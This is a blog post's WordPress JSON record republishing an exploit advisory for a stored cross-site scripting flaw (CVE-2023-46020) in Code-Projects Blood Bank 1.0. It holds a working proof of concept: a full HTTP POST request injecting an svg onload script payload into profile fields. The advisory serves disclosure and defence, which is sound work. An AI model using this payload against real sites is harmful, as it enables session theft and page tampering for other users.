{"id":55798,"date":"2024-04-03T01:11:03","date_gmt":"2024-04-02T21:11:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177879\/bloodbank10p-xss.txt"},"modified":"2024-04-03T01:11:03","modified_gmt":"2024-04-02T21:11:03","slug":"blood-bank-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/blood-bank-1-0-cross-site-scripting\/","title":{"rendered":"Blood Bank 1.0 Cross Site Scripting"},"content":{"rendered":"<p># Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)<br \/># Date: 2023-11-14<br \/># Exploit Author: Ersin Erenler<br \/># Vendor Homepage: https:\/\/code-projects.org\/blood-bank-in-php-with-source-code<br \/># Software Link: https:\/\/download-media.code-projects.org\/2020\/11\/Blood_Bank_In_PHP_With_Source_code.zip<br \/># Version: 1.0<br \/># Tested on: Windows\/Linux, Apache 2.4.54, PHP 8.2.0<br \/># CVE : CVE-2023-46020<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p># Description:<\/p>\n<p>The parameters rename, remail, rphone, and rcity in the \/file\/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user&#8217;s profile.<\/p>\n<p>Vulnerable File: updateprofile.php<\/p>\n<p>Parameters: rename, remail, rphone, rcity<\/p>\n<p># Proof of Concept:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>1. Intercept the POST request to updateprofile.php via Burp Suite<br \/>2. Inject the payload to the vulnerable parameters<br \/>3. Payload: &#8220;&gt;&lt;svg\/onload=alert(document.domain)&gt;<br \/>4. Example request for rname parameter:<\/p>\n<p>&#8212;<\/p>\n<p>POST \/bloodbank\/file\/updateprofile.php HTTP\/1.1<br \/>Host: localhost<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/119.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate, br<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 103<br \/>Origin: http:\/\/localhost<br \/>Connection: close<br \/>Referer: http:\/\/localhost\/bloodbank\/rprofile.php?id=1<br \/>Cookie: PHPSESSID=&lt;some-cookie-value&gt;<br \/>Upgrade-Insecure-Requests: 1<br \/>Sec-Fetch-Dest: document<br \/>Sec-Fetch-Mode: navigate<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-User: ?1<\/p>\n<p>rname=test&#8221;&gt;&lt;svg\/onload=alert(document.domain)&gt;&amp;remail=test%40gmail.com&amp;rpassword=test&amp;rphone=8875643456&amp;rcity=lucknow&amp;bg=A%2B&amp;update=Update<\/p>\n<p>&#8212;-<\/p>\n<p>5. Go to the profile page and trigger the XSS<\/p>\n<p>XSS Payload:<\/p>\n<p>&#8220;&gt;&lt;svg\/onload=alert(document.domain)&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)# Date: 2023-11-14# Exploit Author: Ersin Erenler# Vendor Homepage: https:\/\/code-projects.org\/blood-bank-in-php-with-source-code# Software Link: https:\/\/download-media.code-projects.org\/2020\/11\/Blood_Bank_In_PHP_With_Source_code.zip# Version: 1.0# Tested on: Windows\/Linux, Apache 2.4.54, PHP 8.2.0# CVE : CVE-2023-46020 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- # Description: The parameters rename, remail, rphone, and rcity in the \/file\/updateprofile.php file of Code-Projects Blood Bank V1.0 are &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55798","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55798","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55798"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55798\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55798"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55798"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55798"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}